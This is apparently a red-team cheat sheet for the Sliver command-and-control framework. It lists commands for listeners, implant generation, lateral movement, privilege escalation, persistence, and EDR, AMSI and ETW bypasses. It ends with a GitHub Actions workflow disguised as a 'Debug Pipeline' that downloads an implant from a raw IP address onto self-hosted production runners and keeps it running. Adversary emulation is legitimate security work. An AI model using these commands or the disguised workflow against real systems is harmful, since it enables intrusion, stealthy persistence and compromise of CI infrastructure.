Sliver

Sliver, an open-source cross-platform adversary emulation and red team framework, enables organizations of all sizes to conduct security testing. Sliver implants support various communication channels, including Mutual TLS (mTLS), WireGuard, HTTP(S), and DNS. These implants are dynamically compiled and possess unique X.509 certificates signed by a per-instance certificate authority generated upon initial binary execution. Both Sliver server and client applications run on macOS, Windows, and Linux. Implant compatibility extends to these same operating systems.

Installation

curl https://sliver.sh/install|sudo bash

Summary

• Sliver
• Installation
• Summary
• Sliver Service
  • Restart Deamon \& Start Sliver
  • Install Letsencrypt
  • Setup Letsencrypt
  • Create a New Website
• Team Server
  • Create New Operator
  • Connect to Team Server
  • Create New Listener
  • MTLS
  • HTTPS
  • HTTPS Domain
  • HTTP
• Payload Creation
  • Generate Shellcode
  • Generate Binary
• Post Exploitation
  • Beacon
  • Sessions
  • Kill All Session
  • Lateral Movement
  • SMB Listener
  • PSEXEC Lateral Movement
  • WMI Lateral Movement
• Internal Reconnaissance
  • Situational Awareness - Local
  • Situational Awareness - Domain
• Privilege Escalation
• Persistence
• Pivoting
  • Socks Proxy
• Defense Evasion
  • EDR Bypass
  • ETW Bypass
  • AMSI Bypass
• Session Passing
  • Install Metasploit
  • Setup Metasploit Handler
  • Inject Metasploit
• Misc
  • Install Extension From Local
  • Install Extension Using Armory
• Scripts from the Battlefield
  • Linux keep alive service
  • Infect GitHub runner using a GitHub Action

Sliver Service

cat > /etc/systemd/system/sliver.service << EOL
[Unit]
Description=Sliver Server
After=syslog.target network.target

[Service]
Type=simple
Restart=always
RestartSec=120
LimitNOFILE=20000
Environment=LANG=en_US.UTF-8
ExecStart=/opt/sliver/sliver-server_linux daemon -l 0.0.0.0 -p <port>

[Install]
WantedBy=multi-user.target
EOL

Restart Deamon & Start Sliver

systemctl daemon-reload
systemctl enable --now sliver 

Install Letsencrypt

apt install letsencrypt -y

Setup Letsencrypt

apt install apache2 -y
certbot certonly --non-interactive --quiet --register-unsafely-without-email --agree-tos -a webroot --webroot-path=/var/www/html -d <domain>

Create a New Website

Clone website with wget.

wget --mirror --convert-links --html-extension <target>

Add content to HTTP(S) C2 websites to make them look more legit.

websites add-content --website <name> --web-path <path> --content ./public --recursive

Team Server

Create New Operator

./sliver-server_linux operator -l <teamserver_ip> -p <teamserver_port> -n <username> -s /tmp/<username>.cfg

Connect to Team Server

sliver-client import /tmp/<username>.cfg
sliver-client

Create New Listener

MTLS

mtls -l 443 -L 0.0.0.0 -p

HTTPS

https -l 443 -L 0.0.0.0 -p

HTTPS Domain

https --domain <domain> --cert /path/cert.pem --key /path/privkey.pem --website <website_name> -p

HTTP

http -l 80 -L 0.0.0.0 -p

Payload Creation

Generate Shellcode

generate beacon --mtls <ip address>:<port> -f shellcode

Generate Binary

generate beacon --http <ip address>:<port>

Post Exploitation

Beacon

use <beacon_id>

Sessions

Switching from Beacon Mode to Session Mode

sessions
use <sessions_id>
interactive

Kill All Session

sessions -F -K

Lateral Movement

SMB Listener

pivots named-pipe --bind <named_pipe>
profiles new --format service --named-pipe <local_ip>/pipe/<named_pipe> svc-smb-beacon

PSEXEC Lateral Movement

psexec -d Description -s PAEXEC -p svc-smb-beacon <remote_computer>

WMI Lateral Movement

sharp-wmi 'action=exec computername=<remote_computer> command="C:\windows\temp\xxx.exe" result=true'

Internal Reconnaissance

Situational Awareness - Local

seatbelt -p C:\\Windows\\System32\\werfault.exe -- "-group=user"

Situational Awareness - Domain

sharp-hound-3 -- -c all 

Privilege Escalation

sharpup -t 120 -p C:\\Windows\\System32\\werfault.exe audit

Persistence

sharpersist -- '-t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add'

Pivoting

Socks Proxy

interactive
use <session>
socks5 start

Defense Evasion

To run this command need to install extension windows-bypass

EDR Bypass

unhook-boof

ETW Bypass

inject-etw-bypass <pid>

AMSI Bypass

inject-amsi-bypass <pid>

Session Passing

Session passing is using one payload to spawn another payload.

Install Metasploit

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
  chmod 755 msfinstall && \
  ./msfinstall

Setup Metasploit Handler

use exploit/multi/handler 
set payload windows/x64/meterpreter_reverse_https
set lhost <msf_ip>
set lport <msf_port>
exploit -jz

Inject Metasploit

msf --lhost <msf_ip> --lport <msf_port>

Misc

Install Extension From Local

extensions install /path/bof

Install Extension Using Armory

armory install windows-bypass
armory install windows-pivot
armory install situational-awareness
armory install .net-execute
armory install .net-pivot
armory install .net-recon

Scripts from the Battlefield

Linux keep alive service

The service consists of three parts, a bash script, a service and a timer to schedule the keep alive process.

Infect GitHub runner using a GitHub Action

Script to run within GitHub Action to add a Sliver implant and get C2 beacon from self hosted runner

name: 'Install and run Sliver implant'

on:
  schedule: 
    # Each job runs for 5h > 7:00 first time 12:00 next run till 17:00. implant maybe alive for 6h so we have a overlapping window
    # during lunchtime but make sure that we stay within "business" times till 18:00.
    - cron: '0 7 * * 1-5'
    - cron: '0 12 * * 1-5'
  workflow_dispatch:

jobs:
  infect_runner:
    name: "Debug Pipeline"
    runs-on: [ self-hosted, linux, X64, default, prd ]

    steps:
      - name: 'Download & run implant'
        shell: bash
        run: |
          sudo -i
          cd /tmp
          curl -ko implant https://34.76.180.226/iGZOuiYe/FANCY_SHAKER
          chmod +x implant

          # Function to stop the implant and exit the pipeline
          cleanup() {
            echo "$(date '+%Y-%m-%d %H:%M:%S') - Stopping implant and exiting..."
            pkill -f ./implant
            exit 0
          }

          # Function to start and monitor the implant process
          start_implant() {
            echo "$(date '+%Y-%m-%d %H:%M:%S') - Starting implant ..."
            ./implant &
            IMPLANT_PID=$!
            echo "$(date '+%Y-%m-%d %H:%M:%S') - Implant is now running with PID ${IMPLANT_PID} and starting to monitor the process"
          }

          # Initialize IMPLANT_PID with NONE
          IMPLANT_PID=NONE

          # Set end time to 5.5 hours
          end_time=$(( $(date +%s) + 19800 ))  # 19800 seconds is 5.5 hours

          # Start and init monitoring of the implant process
          start_implant

          while [ $(date +%s) -lt $end_time ]; do
            # Monitor if the implant process is still running
            if ! kill -0 $IMPLANT_PID 2>/dev/null; then
              echo "$(date '+%Y-%m-%d %H:%M:%S') - Implant stopped unexpectedly, restarting..."
              start_implant
            fi

            echo "$(date '+%Y-%m-%d %H:%M:%S') - Left implant monitoring but might still be running with PID ${IMPLANT_PID}"

            current_time=$(date +%s)
            # Check if the end time is reached
            if [ $current_time -ge $end_time ]; then
              echo "$(date '+%Y-%m-%d %H:%M:%S') - End time reached, stopping implant..." 
              cleanup
              break
            fi
            sleep 10
          done

Share this content